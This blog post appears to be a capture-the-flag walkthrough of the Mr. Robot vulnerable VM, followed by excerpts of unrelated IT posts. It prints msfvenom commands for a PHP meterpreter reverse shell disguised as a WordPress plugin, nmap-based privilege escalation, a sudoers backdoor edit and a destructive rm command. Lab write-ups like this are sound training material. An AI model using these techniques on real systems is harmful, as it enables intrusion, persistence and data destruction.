Skip to main content

CTF – Hacking Mr. Robot by EM

Another learning experience to improve my penetration testing skills by hacking Mr. Robot virtual machine as my target machine.
My private network for this penetration testing exercise.
  • Kali Linux, my tool to exploit the target machine. IP Address
  • Mr.Robot, my target machine. IP Address: Unknown
que-com-mr-robotLet's begin. My objective is to find the three hidden keys.
Sponsored by Life Insurance.
I have no knowledge of my target machine (Mr. Robot) IP Address, so let me begin running nmap tool. Of course, you can also use other network discovery tool to scan your network. I prefer nmap tool, it is available to my pentest machine.
root@kali:~# nmap -T4
Starting Nmap 7.31 ( ) at 2016-11-30 10:41 EST
Nmap scan report for
Host is up (0.00037s latency).
Not shown: 997 filtered ports
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for
Host is up (0.00015s latency).
All 1000 scanned ports on are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for
Host is up (0.0000050s latency).
All 1000 scanned ports on are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
I discovered my target machine IP address and open ports. That's a basic enumeration, scanning my private network.
Port 80 and 443 are interesting ports to start poking around. Let's see what's on this website. I'm calling firefox program direct from the command prompt, of course you can simply click on the Firefox icon and enter the IP Address of the web server. It's cool to use CLI to run a command.
root@kali:~/KING.NET/mr.robot# firefox
The website started loading a javascript, looks like loading a linux environment.
Opening the source code, got this fancy "Your are not alone".
Checking to see if I can use any of this information to hack Mr.Robot box.
Nothing so far. I will come back to this webpage later on.
Let's try using "dirbuster" to know our target website.
root@kali:~/KING.NET/mr.robot# dirb
DIRB v2.22
By The Dark Raver
START_TIME: Wed Nov 30 19:18:31 2016
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
---- Scanning URL: ----
+ (CODE:301|SIZE:0)
+ (CODE:302|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:1077)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:516314)
==> DIRECTORY: (CODE:200|SIZE:309) (CODE:302|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:403|SIZE:94)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:64) (CODE:200|SIZE:41) (CODE:200|SIZE:41)
+ (CODE:301|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:0) (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:227)
+ (CODE:200|SIZE:0) (CODE:200|SIZE:2627)
--- snip --- dirbuster still running.
I have to cancel it. I think I have enough information to start digging. There are so much information from this dir results. Getting to know of some sub-folders e.g. /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. I think Mr.Robot box website is using a WordPress content management system. Nice.
Checking the following sub-folder.
root@kali:~/KING.NET/mr.robot# firefox
A webpage with this content "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Sponsored by Life Insurance.
Continue to scroll down 'till the end of the page to see this text "
do you want a password or something?" and this code.
Copied to nano and save as 1stdump.txt to check for base64. Run base64 -d -i 1stdump.txt
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
Look like we have elliot:ER28-0652 username and maybe a password. Let's try to login to Mr.Robot virtual machine and if this account information work.
No luck! Continue hacking the box :(.
Let me try using this account here, It's a success!
Checking the user, "elliot" username is also the Administrator. Jackpot! And another user micho05654 role as subcriber. I will ignore this subscriber user, and focus to elliot as administrator.
Now, I can control this box from here. Exploiting the WordPress CMS since I have an Administrator rights through a reverse shell. Let Kali virtual machine do the work for us. Click on Applications, Exploitation Tools, then click MSF Payload. It will open the MSFVenom Payload Creator in a new terminal window. I run the command below.
root@kali:~# msfpc php 443 msf reverse stageless tcp
This command interpret to run msfpc payload create using type php, the IP address e.g. of the attacker using port 433, using msf for cross platform shell gaining full power of metasploit, reverse to make the target connect back to the attacker in a complete stand alone payload (stageless), using tcp standard method of connecting back. I hope that make sense to you, otherwise type --help for more details.
root@kali:~# msfpc php 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP:
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST= LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
And the command to run "msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'". All ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listening (attacker) machine ready and waiting for connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also provided a website that I can use to exploit my target e.g. python -m SimpleHTTPServer 8080. But in this scenario, I will not use it because I already have administrator access to the WordPress site. All I need to do is install my payload through WordPress as plugin. At this point, I can create havoc to the WordPress installation by deleting contents but the main goal is to own the box (pwn to root or pwn 2 r00t).
I will edit the php file with additional information so I can use it as WordPress plugin. Here's the updated php file.
Plugin Name: Pwn-to-Root
Plugin URI:
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI:
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
Then zip the php file.
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
The payload is now ready. I can use the zip file to upload as plugin in WordPress management console. Let's go back to the WordPress admin page. In Plugin, click add new plugin, then upload the zip file. Browse the zip file, click Install Now. Wait to complete the upload.
I've already started the listening machine (above), so all I need to do is click Activate Plugin to create the reverse access. When I check my listening machine, I see our session.
[*] Meterpreter session 1 opened ( -> at 2016-12-03 23:39:58 -0500
From the listening machine, type help to check all available commands.
msf exploit(handler) > help sessions
Type "sessions"
msf exploit(handler) > sessions
Active sessions
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux daemon (1) @ linux -> (
msf exploit(handler) >
Type "help sessions" to see options on how to connect using sessions.
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
Now, I can connect to session id 1 using -i option for Interact with supplied session ID
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in session. From here I can use local commands using Mr.Robot machine  e.g. ls, pwd
meterpreter > pwd
---snip --
00644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
meterpreter >
Let me check the home directory.
meterpreter > ls /home
Listing: /home
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
I see robot directory, continue digging ...
meterpreter > ls
Listing: /home
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In /home/robot directory, two files found
  1. key-2-of-3.txt
  2. password.raw-md5
I can't access the "key-2-of-3.txt"  file because it is only available (r--------) owner, e.g. user "robot". See error below, but "password.raw-md5" is available (rw-r--r--)
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
meterpreter >
The "robot:c3fcd3d76192e4007dfb496cca67e13b" stands for username:password. I've used online MD5 decryter tool ( to produce the value of "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz". Wow! the password is so basic. If I run a password cracker earlier, I'm sure I can get this password in under 2 minutes. Anyway, let me login to Mr.Robot box using this username (robot) and password (abcdefghijklmnopqrstuvwxyz).
Successfully login as robot and (abcdefghijklmnopqrstuvwxyz). Run ls command to check directory listing.
Run "cat key-2-of-3.txt" to view the file.
Check if I can "ls /root"
Oops ... it seems more research for me to get the root access.
After long hours of research and reading other penetration testing website/blogs...
I checked Mr.Robot box nmap version.
I can use "nmap --interactive" using !bash to runs shell command.
No luck.
Now, trying !sh to runs shell command. Type "exit" to get out of bash command.
It's a success using !sh command. Checking /root/firstboot_done it's empty, and /root/key-3-of-3.txt produce our key "04787ddef27c3dee1ee161b21670b4e4".
At this time. I discovered 2 out of 3 keys as listed below.
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
What's next after getting root access? I'm not done yet, my user "robot" still a standard account. I can escalate the privilege of user "robot" to "root" through editing sudoers file to add "robot ALL=(ALL) ALL". Type nano /etc/sudoers to add "robot ALL=(ALL) ALL".
Save it. Exit !sh command, quit nmap, run sudo ls, then enter the robot password. If everything goes well, I can run sudo su for super user.
Sponsored by Life Insurance.
From here, I can do anything to Mr.Robot virtual machine. I can even delete this box by running a command "# rm -r --no-preserve-root".
I still need to find the value of key-1-of-3.txt. Going back to the website, check other sub-folders.
Checking the web page got nothing.
Checking the file,  shows an interesting information e.g. fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox
User-agent: *
run wget
root@kali:~/KING.NET/mr.robot# wget
--2016-12-03 15:13:04--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
The fsocity.dic is 6.91M filesize, it could be a word list.
Let me download the text file too.
root@kali:~/KING.NET/mr.robot# wget
--2016-12-03 15:14:47--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
The key-1-of-3.txt filesize is only 33KB, very small.
I run cat fsocity.dic to check the content, and confirmed it is a dictionary file. I run cat key-1-of-3.txt and produce this result.
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
Found it. key-1-of-3.txt value is "073403c8a58a1f80d943455fb30724b9"
So all keys discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That's fun ...
Thank you for reading my walk through. I will create a follow video later this week.
And I'm still catching up to all the challenge provided by website.
Thank you,
Useful links:


  1. Nice post! I love your style and really want to recommend you, a very nice service for essay and homework! This guys really know how to do it! So don’t be shy and go for it! For now, you don’t have to waste your money and time! Good luck, have fun!


Post a Comment

Popular posts from this blog

Office365 - This resource doesn't accept meetings longer than 1440 minutes

When you create a meeting schedule for number of days , you will see an error  "This resource doesn't accept meetings longer than 1440 minutes". By default the mailbox or room was set for a maximum limit of 1440 minutes. Here's how you can disable this limit. Login to the Office 365 Administration Console In Microsoft Office 365 Exchange, click on Manage . In Manage My Orgnization , click the drop down arrow, and click on Select on Another User . This will prompt you to select the mailbox or room to manage. Select a Mailbox or Room , click OK . In Option, click on Settings. In Scheduling Options, un-check the "Limit meeting duration", then click on Save. That's all. You can now schedule a meeting or reserve a room for number of days. Hope this help you. If this helped you, please take the time to share this post by sharing using Google+, Facebook, Twitter, or LinkedIn

Out of Office Reply for Termed Employee

This is a sample Out of Office message that I used for termed employees, unless HR staff specified a different message. === Example for KING.NET Employee === John Doe (employee or consultant)  is no longer with KING.NET effective  June 1, 2013  (termination date). For matters relating to " Project Name here " please direct your concerns to  John Smith at (Manager or Supervisor) . For all other matters, please direct your email to Mary Smith HR at Please call our main office 703-345-6789 if you have other concerns. Thank you. === End of message === I posted this article year 2008 from my old blog. If this helped you, please take the time to share this post by sharing using Google+, Facebook, Twitter, or LinkedIn

VMware ESXi to add storage

Have you tried to add storage in your VMware environment after the initial setup and configuration? In my case, I needed to add storage for more space to copy virtual machine files. This is also the same approach to access a USB drive to import a vmx and vmdk files (virtual machine and data storage). For this article, I will provide a step by step procedure on how to add your USB drive from one of your Windows Server (or workstation). Let's use a Windows Server 2003 for reading your USB drive. By default, the NFS service is not enable. So, you have to add this service first. Go to Start , Control Panel , Add or Remove Programs , Add/Remove Windows Components , Other Network and Print Services , and select all for Microsoft Services for NFS . You asked, Why enable NFS Service? The VMware is based using Linux, so you need to enable NFS service to share your network drive or folder. Share a USB drive or folder. Open your Windows Explorer and browse your USB drive. In your